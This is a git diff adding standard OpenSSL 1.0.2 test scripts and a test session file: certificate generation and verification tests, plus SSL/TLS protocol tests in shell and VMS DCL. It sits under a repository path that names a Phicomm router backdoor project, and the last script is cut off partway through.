+$ test_ecdh:
+$	write sys$output "test ecdh"
+$	mcr 'texe_dir''ecdhtest'
+$	return
+$ test_verify:
+$	write sys$output "The following command should have some OK's and some failures"
+$	write sys$output "There are definitly a few expired certificates"
+$	@tverify.com 'pointer_size'
+$	return
+$ test_dh:
+$	write sys$output "Generate a set of DH parameters"
+$	mcr 'texe_dir''dhtest'
+$	return
+$ test_dsa:
+$	write sys$output "Generate a set of DSA parameters"
+$	mcr 'texe_dir''dsatest'
+$	return
+$ test_gen:
+$	write sys$output "Generate and verify a certificate request"
+$	@testgen.com 'pointer_size'
+$	return
+$ maybe_test_ss:
+$	testss_RDT = f$cvtime(f$file_attributes("testss.com","RDT"))
+$	if f$cvtime(f$file_attributes("keyU.ss","RDT")) .les. testss_RDT then -
+		goto test_ss
+$	if f$cvtime(f$file_attributes("certU.ss","RDT")) .les. testss_RDT then -
+		goto test_ss
+$	if f$cvtime(f$file_attributes("certCA.ss","RDT")) .les. testss_RDT then -
+		goto test_ss
+$	return
+$ test_ss:
+$	write sys$output "Generate and certify a test certificate"
+$	@testss.com 'pointer_size'
+$	return
+$ test_engine: 
+$	write sys$output "Manipulate the ENGINE structures"
+$	mcr 'texe_dir''enginetest'
+$	return
+$ test_ssl:
+$	write sys$output "test SSL protocol"
+$	gosub maybe_test_ss
+$	@testssl.com keyU.ss certU.ss certCA.ss 'pointer_size'
+$	return
+$ test_ca:
+$	set noon
+$	define /user_mode sys$output test_ca.out
+$	mcr 'exe_dir'openssl no-rsa
+$	save_severity=$SEVERITY
+$	set on
+$	if save_severity
+$	then
+$	    write sys$output "skipping CA.com test -- requires RSA"
+$	else
+$	    write sys$output "Generate and certify a test certificate via the 'ca' program"
+$	    @testca.com 'pointer_size'
+$	endif
+$	return
+$ test_aes: 
+$!	write sys$output "test AES"
+$!	!mcr 'texe_dir''aestest'
+$	return
+$ test_tsa:
+$	set noon
+$	define /user_mode sys$output nla0:
+$	mcr 'exe_dir'openssl no-rsa
+$	save_severity=$SEVERITY
+$	set on
+$	if save_severity
+$	then
+$	    write sys$output "skipping testtsa.com test -- requires RSA"
+$	else
+$	    @testtsa.com "" "" "" 'pointer_size'
+$	endif
+$	return
+$ test_ige: 
+$	write sys$output "Test IGE mode"
+$	mcr 'texe_dir''igetest'
+$	return
+$ test_jpake: 
+$	write sys$output "Test JPAKE"
+$	mcr 'texe_dir''jpaketest'
+$	return
+$ test_cms:
+$	write sys$output "CMS consistency test"
+$	! Define the logical name used to find openssl.exe in the perl script.
+$	define /user_mode osslx 'exe_dir'
+$	perl CMS-TEST.PL
+$	return
+$ test_srp: 
+$	write sys$output "Test SRP"
+$	mcr 'texe_dir''srptest'
+$	return
+$ test_ocsp:
+$	write sys$output "Test OCSP"
+$	@tocsp.com
+$	return
+$ test_v3name:
+$       write sys$output "Test V3NAME"
+$       mcr 'texe_dir''v3nametest'
+$       return
+$ test_heartbeat:
+$       write sys$output "Test HEARTBEAT"
+$       mcr 'texe_dir''heartbeattest'
+$       return
+$ test_constant_time:
+$       write sys$output "Test constant time utilities"
+$       mcr 'texe_dir''consttimetest'
+$       return
+$
+$
+$ exit:
+$	on error then goto exit2 ! In case openssl.exe didn't build.
+$	mcr 'exe_dir'openssl version -a
+$ exit2: 
+$	set default '__save_default'
+$	deassign sslroot
+$	exit
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testsid.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testsid.pem
new file mode 100644
index 0000000..7ffd008
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testsid.pem
@@ -0,0 +1,12 @@
+-----BEGIN SSL SESSION PARAMETERS-----
+MIIB1gIBAQIBAgQDAQCABBCi11xa5qkOP8xrr02K/NQCBBBkIYQZM0Bt95W0EHNV
+bA58oQYCBDIBr7WiBAICASyjggGGMIIBgjCCASwCAQMwDQYJKoZIhvcNAQEEBQAw
+ODELMAkGA1UEBhMCQVUxDDAKBgNVBAgTA1FMRDEbMBkGA1UEAxMSU1NMZWF5L3Jz
+YSB0ZXN0IENBMB4XDTk1MTAwOTIzMzEzNFoXDTk4MDcwNTIzMzEzNFowYDELMAkG
+A1UEBhMCQVUxDDAKBgNVBAgTA1FMRDEZMBcGA1UEChMQTWluY29tIFB0eS4gTHRk
+LjELMAkGA1UECxMCQ1MxGzAZBgNVBAMTElNTTGVheSBkZW1vIGNsaWVudDBcMA0G
+CSqGSIb3DQEBAQUAA0sAMEgCQQC4pcXEL1lgVA+B5Q3TcuW/O3LZHoA73IYm8oFD
+TezgCDhL2RTMn+seKWF36UtJKRIOBU9jZHCVVd0Me5ls6BEjAgMBAAEwDQYJKoZI
+hvcNAQEEBQADQQBoIpOcwUY1qlVF7j3ROSGvUsbvByOBFmYWkIBgsCqR+9qo1A7L
+CrWF5i8LWt/vLwAHaxWNx2YuBJMFyuK81fTvpA0EC3Rlc3Rjb250ZXh0
+-----END SSL SESSION PARAMETERS-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testss b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testss
new file mode 100644
index 0000000..1a42685
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testss
@@ -0,0 +1,163 @@
+#!/bin/sh
+
+digest='-sha1'
+reqcmd="../util/shlib_wrap.sh ../apps/openssl req"
+x509cmd="../util/shlib_wrap.sh ../apps/openssl x509 $digest"
+verifycmd="../util/shlib_wrap.sh ../apps/openssl verify"
+dummycnf="../apps/openssl.cnf"
+
+CAkey="keyCA.ss"
+CAcert="certCA.ss"
+CAreq="reqCA.ss"
+CAconf="CAss.cnf"
+CAreq2="req2CA.ss"	# temp
+
+Uconf="Uss.cnf"
+Ukey="keyU.ss"
+Ureq="reqU.ss"
+Ucert="certU.ss"
+
+P1conf="P1ss.cnf"
+P1key="keyP1.ss"
+P1req="reqP1.ss"
+P1cert="certP1.ss"
+P1intermediate="tmp_intP1.ss"
+
+P2conf="P2ss.cnf"
+P2key="keyP2.ss"
+P2req="reqP2.ss"
+P2cert="certP2.ss"
+P2intermediate="tmp_intP2.ss"
+
+echo
+echo "make a certificate request using 'req'"
+
+echo "string to make the random number generator think it has entropy" >> ./.rnd
+
+if ../util/shlib_wrap.sh ../apps/openssl no-rsa; then
+  req_new='-newkey dsa:../apps/dsa512.pem'
+else
+  req_new='-new'
+fi
+
+$reqcmd -config $CAconf -out $CAreq -keyout $CAkey $req_new #>err.ss
+if [ $? != 0 ]; then
+	echo "error using 'req' to generate a certificate request"
+	exit 1
+fi
+echo
+echo "convert the certificate request into a self signed certificate using 'x509'"
+$x509cmd -CAcreateserial -in $CAreq -days 30 -req -out $CAcert -signkey $CAkey -extfile $CAconf -extensions v3_ca >err.ss
+if [ $? != 0 ]; then
+	echo "error using 'x509' to self sign a certificate request"
+	exit 1
+fi
+
+echo
+echo "convert a certificate into a certificate request using 'x509'"
+$x509cmd -in $CAcert -x509toreq -signkey $CAkey -out $CAreq2 >err.ss
+if [ $? != 0 ]; then
+	echo "error using 'x509' convert a certificate to a certificate request"
+	exit 1
+fi
+
+$reqcmd -config $dummycnf -verify -in $CAreq -noout
+if [ $? != 0 ]; then
+	echo first generated request is invalid
+	exit 1
+fi
+
+$reqcmd -config $dummycnf -verify -in $CAreq2 -noout
+if [ $? != 0 ]; then
+	echo second generated request is invalid
+	exit 1
+fi
+
+$verifycmd -CAfile $CAcert $CAcert
+if [ $? != 0 ]; then
+	echo first generated cert is invalid
+	exit 1
+fi
+
+echo
+echo "make a user certificate request using 'req'"
+$reqcmd -config $Uconf -out $Ureq -keyout $Ukey $req_new >err.ss
+if [ $? != 0 ]; then
+	echo "error using 'req' to generate a user certificate request"
+	exit 1
+fi
+
+echo
+echo "sign user certificate request with the just created CA via 'x509'"
+$x509cmd -CAcreateserial -in $Ureq -days 30 -req -out $Ucert -CA $CAcert -CAkey $CAkey -extfile $Uconf -extensions v3_ee >err.ss
+if [ $? != 0 ]; then
+	echo "error using 'x509' to sign a user certificate request"
+	exit 1
+fi
+
+$verifycmd -CAfile $CAcert $Ucert
+echo
+echo "Certificate details"
+$x509cmd -subject -issuer -startdate -enddate -noout -in $Ucert
+
+echo
+echo "make a proxy certificate request using 'req'"
+$reqcmd -config $P1conf -out $P1req -keyout $P1key $req_new >err.ss
+if [ $? != 0 ]; then
+	echo "error using 'req' to generate a proxy certificate request"
+	exit 1
+fi
+
+echo
+echo "sign proxy certificate request with the just created user certificate via 'x509'"
+$x509cmd -CAcreateserial -in $P1req -days 30 -req -out $P1cert -CA $Ucert -CAkey $Ukey -extfile $P1conf -extensions v3_proxy >err.ss
+if [ $? != 0 ]; then
+	echo "error using 'x509' to sign a proxy certificate request"
+	exit 1
+fi
+
+cat $Ucert > $P1intermediate
+$verifycmd -CAfile $CAcert -untrusted $P1intermediate $P1cert
+echo
+echo "Certificate details"
+$x509cmd -subject -issuer -startdate -enddate -noout -in $P1cert
+
+echo
+echo "make another proxy certificate request using 'req'"
+$reqcmd -config $P2conf -out $P2req -keyout $P2key $req_new >err.ss
+if [ $? != 0 ]; then
+	echo "error using 'req' to generate another proxy certificate request"
+	exit 1
+fi
+
+echo
+echo "sign second proxy certificate request with the first proxy certificate via 'x509'"
+$x509cmd -CAcreateserial -in $P2req -days 30 -req -out $P2cert -CA $P1cert -CAkey $P1key -extfile $P2conf -extensions v3_proxy >err.ss
+if [ $? != 0 ]; then
+	echo "error using 'x509' to sign a second proxy certificate request"
+	exit 1
+fi
+
+cat $Ucert $P1cert > $P2intermediate
+$verifycmd -CAfile $CAcert -untrusted $P2intermediate $P2cert
+echo
+echo "Certificate details"
+$x509cmd -subject -issuer -startdate -enddate -noout -in $P2cert
+
+echo
+echo The generated CA certificate is $CAcert
+echo The generated CA private key is $CAkey
+
+echo The generated user certificate is $Ucert
+echo The generated user private key is $Ukey
+
+echo The first generated proxy certificate is $P1cert
+echo The first generated proxy private key is $P1key
+
+echo The second generated proxy certificate is $P2cert
+echo The second generated proxy private key is $P2key
+
+/bin/rm err.ss
+#/bin/rm $P1intermediate
+#/bin/rm $P2intermediate
+exit 0
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testss.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testss.com
new file mode 100644
index 0000000..32a74d0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testss.com
@@ -0,0 +1,123 @@
+$! TESTSS.COM
+$
+$	__arch = "VAX"
+$	if f$getsyi("cpu") .ge. 128 then -
+	   __arch = f$edit( f$getsyi( "ARCH_NAME"), "UPCASE")
+$	if __arch .eqs. "" then __arch = "UNK"
+$!
+$	if (p1 .eqs. "64") then __arch = __arch+ "_64"
+$!
+$	exe_dir = "sys$disk:[-.''__arch'.exe.apps]"
+$
+$	digest="-md5"
+$	reqcmd = "mcr ''exe_dir'openssl req"
+$	x509cmd = "mcr ''exe_dir'openssl x509 ''digest'"
+$	verifycmd = "mcr ''exe_dir'openssl verify"
+$	dummycnf = "sys$disk:[-.apps]openssl-vms.cnf"
+$
+$	CAkey="""keyCA.ss"""
+$	CAcert="""certCA.ss"""
+$	CAreq="""reqCA.ss"""
+$	CAconf="""CAss.cnf"""
+$	CAreq2="""req2CA.ss"""	! temp
+$
+$	Uconf="""Uss.cnf"""
+$	Ukey="""keyU.ss"""
+$	Ureq="""reqU.ss"""
+$	Ucert="""certU.ss"""
+$
+$	write sys$output ""
+$	write sys$output "make a certificate request using 'req'"
+$
+$	set noon
+$	define/user sys$output nla0:
+$	mcr 'exe_dir'openssl no-rsa
+$	save_severity=$SEVERITY
+$	set on
+$	if save_severity
+$	then
+$	    req_new="-newkey dsa:[-.apps]dsa512.pem"
+$	else
+$	    req_new="-new"
+$	endif
+$
+$	'reqcmd' -config 'CAconf' -out 'CAreq' -keyout 'CAkey' 'req_new' ! -out err.ss
+$	if $severity .ne. 1
+$	then
+$		write sys$output "error using 'req' to generate a certificate request"
+$		exit 3
+$	endif
+$	write sys$output ""
+$	write sys$output "convert the certificate request into a self signed certificate using 'x509'"
+$	define /user sys$output err.ss
+$	'x509cmd' "-CAcreateserial" -in 'CAreq' -days 30 -req -out 'CAcert' -signkey 'CAkey'
+$	if $severity .ne. 1
+$	then
+$		write sys$output "error using 'x509' to self sign a certificate request"
+$		exit 3
+$	endif
+$
+$	write sys$output ""
+$	write sys$output "convert a certificate into a certificate request using 'x509'"
+$	define /user sys$output err.ss
+$	'x509cmd' -in 'CAcert' -x509toreq -signkey 'CAkey' -out 'CAreq2'
+$	if $severity .ne. 1
+$	then
+$		write sys$output "error using 'x509' convert a certificate to a certificate request"
+$		exit 3
+$	endif
+$
+$	'reqcmd' -config 'dummycnf' -verify -in 'CAreq' -noout
+$	if $severity .ne. 1
+$	then
+$		write sys$output "first generated request is invalid"
+$		exit 3
+$	endif
+$
+$	'reqcmd' -config 'dummycnf' -verify -in 'CAreq2' -noout
+$	if $severity .ne. 1
+$	then
+$		write sys$output "second generated request is invalid"
+$		exit 3
+$	endif
+$
+$	'verifycmd' "-CAfile" 'CAcert' 'CAcert'
+$	if $severity .ne. 1
+$	then
+$		write sys$output "first generated cert is invalid"
+$		exit 3
+$	endif
+$
+$	write sys$output ""
+$	write sys$output "make another certificate request using 'req'"
+$	define /user sys$output err.ss
+$	'reqcmd' -config 'Uconf' -out 'Ureq' -keyout 'Ukey' 'req_new'
+$	if $severity .ne. 1
+$	then
+$		write sys$output "error using 'req' to generate a certificate request"
+$		exit 3
+$	endif
+$
+$	write sys$output ""
+$	write sys$output "sign certificate request with the just created CA via 'x509'"
+$	define /user sys$output err.ss
+$	'x509cmd' "-CAcreateserial" -in 'Ureq' -days 30 -req -out 'Ucert' "-CA" 'CAcert' "-CAkey" 'CAkey'
+$	if $severity .ne. 1
+$	then
+$		write sys$output "error using 'x509' to sign a certificate request"
+$		exit 3
+$	endif
+$
+$	'verifycmd' "-CAfile" 'CAcert' 'Ucert'
+$	write sys$output ""
+$	write sys$output "Certificate details"
+$	'x509cmd' -subject -issuer -startdate -enddate -noout -in 'Ucert'
+$
+$	write sys$output ""
+$	write sys$output "The generated CA certificate is ",CAcert
+$	write sys$output "The generated CA private key is ",CAkey
+$
+$	write sys$output "The generated user certificate is ",Ucert
+$	write sys$output "The generated user private key is ",Ukey
+$
+$	if f$search("err.ss;*") .nes. "" then delete err.ss;*
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testssl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testssl
new file mode 100644
index 0000000..e3b342b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testssl
@@ -0,0 +1,223 @@
+#!/bin/sh
+
+if [ "$1" = "" ]; then
+  key=../apps/server.pem
+else
+  key="$1"
+fi
+if [ "$2" = "" ]; then
+  cert=../apps/server.pem
+else
+  cert="$2"
+fi
+ssltest="../util/shlib_wrap.sh ./ssltest -key $key -cert $cert -c_key $key -c_cert $cert"
+
+if ../util/shlib_wrap.sh ../apps/openssl x509 -in $cert -text -noout | fgrep 'DSA Public Key' >/dev/null; then
+  dsa_cert=YES
+else
+  dsa_cert=NO
+fi
+
+if [ "$3" = "" ]; then
+  CA="-CApath ../certs"
+else
+  CA="-CAfile $3"
+fi
+
+if [ "$4" = "" ]; then
+  extra=""
+else
+  extra="$4"
+fi
+
+serverinfo="./serverinfo.pem"
+
+#############################################################################
+
+echo test sslv2
+$ssltest -ssl2 $extra || exit 1
+
+echo test sslv2 with server authentication
+$ssltest -ssl2 -server_auth $CA $extra || exit 1
+
+if [ $dsa_cert = NO ]; then
+  echo test sslv2 with client authentication
+  $ssltest -ssl2 -client_auth $CA $extra || exit 1
+
+  echo test sslv2 with both client and server authentication
+  $ssltest -ssl2 -server_auth -client_auth $CA $extra || exit 1
+fi
+
+echo test sslv3
+$ssltest -ssl3 $extra || exit 1
+
+echo test sslv3 with server authentication
+$ssltest -ssl3 -server_auth $CA $extra || exit 1
+
+echo test sslv3 with client authentication
+$ssltest -ssl3 -client_auth $CA $extra || exit 1
+
+echo test sslv3 with both client and server authentication
+$ssltest -ssl3 -server_auth -client_auth $CA $extra || exit 1
+
+echo test sslv2/sslv3
+$ssltest $extra || exit 1
+
+echo test sslv2/sslv3 with server authentication
+$ssltest -server_auth $CA $extra || exit 1
+
+echo test sslv2/sslv3 with client authentication
+$ssltest -client_auth $CA $extra || exit 1
+
+echo test sslv2/sslv3 with both client and server authentication
+$ssltest -server_auth -client_auth $CA $extra || exit 1
+
+echo test sslv2 via BIO pair
+$ssltest -bio_pair -ssl2 $extra || exit 1
+
+echo test sslv2 with server authentication via BIO pair
+$ssltest -bio_pair -ssl2 -server_auth $CA $extra || exit 1
+
+if [ $dsa_cert = NO ]; then
+  echo test sslv2 with client authentication via BIO pair
+  $ssltest -bio_pair -ssl2 -client_auth $CA $extra || exit 1
+
+  echo test sslv2 with both client and server authentication via BIO pair
+  $ssltest -bio_pair -ssl2 -server_auth -client_auth $CA $extra || exit 1
+fi
+
+echo test sslv3 via BIO pair
+$ssltest -bio_pair -ssl3 $extra || exit 1
+
+echo test sslv3 with server authentication via BIO pair
+$ssltest -bio_pair -ssl3 -server_auth $CA $extra || exit 1
+
+echo test sslv3 with client authentication via BIO pair
+$ssltest -bio_pair -ssl3 -client_auth $CA $extra || exit 1
+
+echo test sslv3 with both client and server authentication via BIO pair
+$ssltest -bio_pair -ssl3 -server_auth -client_auth $CA $extra || exit 1
+
+echo test sslv2/sslv3 via BIO pair
+$ssltest $extra || exit 1
+
+if [ $dsa_cert = NO ]; then
+  echo 'test sslv2/sslv3 w/o (EC)DHE via BIO pair'
+  $ssltest -bio_pair -no_dhe -no_ecdhe $extra || exit 1
+fi
+
+echo test sslv2/sslv3 with 1024bit DHE via BIO pair
+$ssltest -bio_pair -dhe1024dsa -v $extra || exit 1
+
+echo test sslv2/sslv3 with server authentication
+$ssltest -bio_pair -server_auth $CA $extra || exit 1
+
+echo test sslv2/sslv3 with client authentication via BIO pair
+$ssltest -bio_pair -client_auth $CA $extra || exit 1
+
+echo test sslv2/sslv3 with both client and server authentication via BIO pair
+$ssltest -bio_pair -server_auth -client_auth $CA $extra || exit 1
+
+echo test sslv2/sslv3 with both client and server authentication via BIO pair and app verify
+$ssltest -bio_pair -server_auth -client_auth -app_verify $CA $extra || exit 1
+
+echo "Testing ciphersuites"
+for protocol in TLSv1.2 SSLv3; do
+  echo "Testing ciphersuites for $protocol"
+  for cipher in `../util/shlib_wrap.sh ../apps/openssl ciphers "RSA+$protocol" | tr ':' ' '`; do
+    echo "Testing $cipher"
+    prot=""
+    if [ $protocol = "SSLv3" ] ; then
+      prot="-ssl3"
+    fi
+    $ssltest -cipher $cipher $prot
+    if [ $? -ne 0 ] ; then
+	  echo "Failed $cipher"
+	  exit 1
+    fi
+  done
+done
+
+#############################################################################
+
+if ../util/shlib_wrap.sh ../apps/openssl no-dh; then
+  echo skipping anonymous DH tests
+else
+  echo test tls1 with 1024bit anonymous DH, multiple handshakes
+  $ssltest -v -bio_pair -tls1 -cipher ADH -dhe1024dsa -num 10 -f -time $extra || exit 1
+fi
+
+if ../util/shlib_wrap.sh ../apps/openssl no-rsa; then
+  echo skipping RSA tests
+else
+  echo 'test tls1 with 1024bit RSA, no (EC)DHE, multiple handshakes'
+  ../util/shlib_wrap.sh ./ssltest -v -bio_pair -tls1 -cert ../apps/server2.pem -no_dhe -no_ecdhe -num 10 -f -time $extra || exit 1
+
+  if ../util/shlib_wrap.sh ../apps/openssl no-dh; then
+    echo skipping RSA+DHE tests
+  else
+    echo test tls1 with 1024bit RSA, 1024bit DHE, multiple handshakes
+    ../util/shlib_wrap.sh ./ssltest -v -bio_pair -tls1 -cert ../apps/server2.pem -dhe1024dsa -num 10 -f -time $extra || exit 1
+  fi
+fi
+
+echo test tls1 with PSK
+$ssltest -tls1 -cipher PSK -psk abc123 $extra || exit 1
+
+echo test tls1 with PSK via BIO pair
+$ssltest -bio_pair -tls1 -cipher PSK -psk abc123 $extra || exit 1
+
+#############################################################################
+# Custom Extension tests
+
+echo test tls1 with custom extensions
+$ssltest -bio_pair -tls1 -custom_ext || exit 1
+
+#############################################################################
+# Serverinfo tests
+
+echo test tls1 with serverinfo
+$ssltest -bio_pair -tls1 -serverinfo_file $serverinfo || exit 1
+$ssltest -bio_pair -tls1 -serverinfo_file $serverinfo -serverinfo_sct || exit 1
+$ssltest -bio_pair -tls1 -serverinfo_file $serverinfo -serverinfo_tack || exit 1
+$ssltest -bio_pair -tls1 -serverinfo_file $serverinfo -serverinfo_sct -serverinfo_tack || exit 1
+$ssltest -bio_pair -tls1 -custom_ext -serverinfo_file $serverinfo -serverinfo_sct -serverinfo_tack || exit 1
+
+
+#############################################################################
+# ALPN tests
+
+$ssltest -bio_pair -tls1 -alpn_client foo -alpn_server bar || exit 1
+$ssltest -bio_pair -tls1 -alpn_client foo -alpn_server foo -alpn_expected foo || exit 1
+$ssltest -bio_pair -tls1 -alpn_client foo,bar -alpn_server foo -alpn_expected foo || exit 1
+$ssltest -bio_pair -tls1 -alpn_client bar,foo -alpn_server foo -alpn_expected foo || exit 1
+$ssltest -bio_pair -tls1 -alpn_client bar,foo -alpn_server foo,bar -alpn_expected foo || exit 1
+$ssltest -bio_pair -tls1 -alpn_client bar,foo -alpn_server bar,foo -alpn_expected bar || exit 1
+$ssltest -bio_pair -tls1 -alpn_client foo,bar -alpn_server bar,foo -alpn_expected bar || exit 1
+$ssltest -bio_pair -tls1 -alpn_client baz -alpn_server bar,foo || exit 1
+
+if ../util/shlib_wrap.sh ../apps/openssl no-srp; then
+  echo skipping SRP tests
+else
+  echo test tls1 with SRP
+  $ssltest -tls1 -cipher SRP -srpuser test -srppass abc123
+
+  echo test tls1 with SRP via BIO pair
+  $ssltest -bio_pair -tls1 -cipher SRP -srpuser test -srppass abc123
+
+  echo test tls1 with SRP auth
+  $ssltest -tls1 -cipher aSRP -srpuser test -srppass abc123
+
+  echo test tls1 with SRP auth via BIO pair
+  $ssltest -bio_pair -tls1 -cipher aSRP -srpuser test -srppass abc123
+fi
+
+#############################################################################
+# Multi-buffer tests
+
+if [ -z "$extra" -a `uname -m` = "x86_64" ]; then
+  $ssltest -cipher AES128-SHA    -bytes 8m	|| exit 1
+  $ssltest -cipher AES128-SHA256 -bytes 8m	|| exit 1
+fi
+
+exit 0
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testssl.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testssl.com
new file mode 100644
index 0000000..f19edc4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testssl.com
@@ -0,0 +1,208 @@
+$! TESTSSL.COM
+$
+$	__arch = "VAX"
+$	if f$getsyi("cpu") .ge. 128 then -
+	   __arch = f$edit( f$getsyi( "ARCH_NAME"), "UPCASE")
+$	if __arch .eqs. "" then __arch = "UNK"
+$!
+$	if (p4 .eqs. "64") then __arch = __arch+ "_64"
+$!
+$	texe_dir = "sys$disk:[-.''__arch'.exe.test]"
+$	exe_dir = "sys$disk:[-.''__arch'.exe.apps]"
+$
+$	if p1 .eqs. ""
+$	then
+$	    key="[-.apps]server.pem"
+$	else
+$	    key=p1
+$	endif
+$	if p2 .eqs. ""
+$	then
+$	    cert="[-.apps]server.pem"
+$	else
+$	    cert=p2
+$	endif
+$	ssltest = "mcr ''texe_dir'ssltest -key ''key'"+ -
+	 " -cert ''cert' -c_key ''key' -c_cert ''cert'"
+$!
+$	set noon
+$	define/user sys$output testssl-x509-output.
+$	define/user sys$error nla0:
+$	mcr 'exe_dir'openssl x509 -in 'cert' -text -noout
+$	define/user sys$error nla0:
+$	search/output=nla0: testssl-x509-output. "DSA Public Key"/exact
+$	if $severity .eq. 1
+$	then
+$	    dsa_cert = "YES"
+$	else
+$	    dsa_cert = "NO"
+$	endif
+$	delete testssl-x509-output.;*
+$
+$	if p3 .eqs. ""
+$	then
+$	    copy/concatenate [-.certs]*.pem certs.tmp
+$	    CA = """-CAfile"" certs.tmp"
+$	else
+$	    CA = """-CAfile"" "+p3
+$	endif
+$
+$!###########################################################################
+$
+$	write sys$output "test sslv2"
+$	'ssltest' -ssl2
+$	if $severity .ne. 1 then goto exit3
+$
+$	write sys$output "test sslv2 with server authentication"
+$	'ssltest' -ssl2 -server_auth 'CA'
+$	if $severity .ne. 1 then goto exit3
+$
+$	if .not. dsa_cert
+$	then
+$	    write sys$output "test sslv2 with client authentication"
+$	    'ssltest' -ssl2 -client_auth 'CA'
+$	    if $severity .ne. 1 then goto exit3
+$
+$	    write sys$output "test sslv2 with both client and server authentication"
+$	    'ssltest' -ssl2 -server_auth -client_auth 'CA'
+$	    if $severity .ne. 1 then goto exit3
+$	endif
+$
+$	write sys$output "test sslv3"
+$	'ssltest' -ssl3
+$	if $severity .ne. 1 then goto exit3
+$
+$	write sys$output "test sslv3 with server authentication"
+$	'ssltest' -ssl3 -server_auth 'CA'
+$	if $severity .ne. 1 then goto exit3
+$
+$	write sys$output "test sslv3 with client authentication"
+$	'ssltest' -ssl3 -client_auth 'CA'
+$	if $severity .ne. 1 then goto exit3
+$
+$	write sys$output "test sslv3 with both client and server authentication"
+$	'ssltest' -ssl3 -server_auth -client_auth 'CA'
+$	if $severity .ne. 1 then goto exit3
+$
+$	write sys$output "test sslv2/sslv3"
+$	'ssltest'
+$	if $severity .ne. 1 then goto exit3
+$
+$	write sys$output "test sslv2/sslv3 with server authentication"
+$	'ssltest' -server_auth 'CA'
+$	if $severity .ne. 1 then goto exit3
+$
+$	write sys$output "test sslv2/sslv3 with client authentication"
+$	'ssltest' -client_auth 'CA'
+$	if $severity .ne. 1 then goto exit3
+$
+$	write sys$output "test sslv2/sslv3 with both client and server authentication"
+$	'ssltest' -server_auth -client_auth 'CA'
+$	if $severity .ne. 1 then goto exit3
+$
+$	write sys$output "test sslv2 via BIO pair"
+$	'ssltest' -bio_pair -ssl2 
+$	if $severity .ne. 1 then goto exit3
+$
+$	write sys$output "test sslv2 with server authentication via BIO pair"
+$	'ssltest' -bio_pair -ssl2 -server_auth 'CA' 
+$	if $severity .ne. 1 then goto exit3
+$
+$	if .not. dsa_cert
+$	then
+$	    write sys$output "test sslv2 with client authentication via BIO pair"
+$	    'ssltest' -bio_pair -ssl2 -client_auth 'CA' 
+$	    if $severity .ne. 1 then goto exit3
+$
+$	    write sys$output "test sslv2 with both client and server authentication via BIO pair"
+$	    'ssltest' -bio_pair -ssl2 -server_auth -client_auth 'CA' 
+$	    if $severity .ne. 1 then goto exit3
+$	endif
+$
+$	write sys$output "test sslv3 via BIO pair"
+$	'ssltest' -bio_pair -ssl3 
+$	if $severity .ne. 1 then goto exit3
+$
+$	write sys$output "test sslv3 with server authentication via BIO pair"
+$	'ssltest' -bio_pair -ssl3 -server_auth 'CA' 
+$	if $severity .ne. 1 then goto exit3
+$
+$	write sys$output "test sslv3 with client authentication via BIO pair"
+$	'ssltest' -bio_pair -ssl3 -client_auth 'CA' 
+$	if $severity .ne. 1 then goto exit3
+ 
+$	write sys$output "test sslv3 with both client and server authentication via BIO pair"
+$	'ssltest' -bio_pair -ssl3 -server_auth -client_auth 'CA' 
+$	if $severity .ne. 1 then goto exit3
+$
+$	write sys$output "test sslv2/sslv3 via BIO pair"
+$	'ssltest' 
+$	if $severity .ne. 1 then goto exit3
+$
+$	if .not. dsa_cert
+$	then
+$	    write sys$output "test sslv2/sslv3 w/o DHE via BIO pair"
+$	    'ssltest' -bio_pair -no_dhe
+$	    if $severity .ne. 1 then goto exit3
+$	endif
+$
+$	write sys$output "test sslv2/sslv3 with 1024 bit DHE via BIO pair"
+$	'ssltest' -bio_pair -dhe1024dsa -v
+$	if $severity .ne. 1 then goto exit3
+$
+$	write sys$output "test sslv2/sslv3 with server authentication"
+$	'ssltest' -bio_pair -server_auth 'CA' 
+$	if $severity .ne. 1 then goto exit3
+$
+$	write sys$output "test sslv2/sslv3 with client authentication via BIO pair"
+$	'ssltest' -bio_pair -client_auth 'CA' 
+$	if $severity .ne. 1 then goto exit3
+$
+$	write sys$output "test sslv2/sslv3 with both client and server authentication via BIO pair"
+$	'ssltest' -bio_pair -server_auth -client_auth 'CA' 
+$	if $severity .ne. 1 then goto exit3
+$
+$!###########################################################################
+$
+$	define/user sys$output nla0:
+$	mcr 'exe_dir'openssl no-rsa
+$	no_rsa=$SEVERITY
+$	define/user sys$output nla0:
+$	mcr 'exe_dir'openssl no-dh
+$	no_dh=$SEVERITY
+$
+$	if no_dh
+$	then
+$	    write sys$output "skipping anonymous DH tests"
+$	else
+$	    write sys$output "test tls1 with 1024bit anonymous DH, multiple handshakes"
+$	    'ssltest' -v -bio_pair -tls1 -cipher "ADH" -dhe1024dsa -num 10 -f -time
+$	    if $severity .ne. 1 then goto exit3
+$	endif
+$
+$	if no_rsa
+$	then
+$	    write sys$output "skipping RSA tests"
+$	else
+$	    write sys$output "test tls1 with 1024bit RSA, no DHE, multiple handshakes"
+$	    mcr 'texe_dir'ssltest -v -bio_pair -tls1 -cert [-.apps]server2.pem -no_dhe -num 10 -f -time
+$	    if $severity .ne. 1 then goto exit3
+$
+$	    if no_dh
+$	    then
+$		write sys$output "skipping RSA+DHE tests"
+$	    else
+$		write sys$output "test tls1 with 1024bit RSA, 1024bit DHE, multiple handshakes"
